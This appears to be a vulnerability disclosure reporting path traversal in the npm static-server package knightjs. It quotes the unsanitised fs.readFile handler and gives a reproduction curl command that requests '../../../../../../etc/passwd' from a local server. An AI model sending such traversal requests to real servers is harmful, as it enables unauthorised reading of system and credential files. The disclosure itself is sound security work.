I would like to report Path Travelsal in Knightjs
It allows attacker to read content of arbitary file on remote server.
module name: Knightjsversion:0.0.1npm page: https://www.npmjs.com/package/knightjs
knight is a simple static server without configuration on the top of Node.js.
~ 10-20 / month
There is no sanitation to the path provided from requests
fs.readFile(pathname, (err, data) => {
if (err) {
res.statusCode = 500
res.end(`Error getting the file: ${err}.`)
} else {
res.statusCode = 200
// based on the URL path, extract the file extention. e.g. .js, .doc, ...
const ext = path.parse(pathname).ext
// if the file is found, set Content-type and send data
res.setHeader('Content-type', mime[ext] || 'text/plain')
res.end(data)
}
})
and if the file exist they will print the data
npm i knightjs
node node_modules/knightjs/bin/knight
curl --path-as-is http://localhost:4000/../../../../../../etc/passwd -v
F340872
It allows attacker to read content of arbitary file on remote server.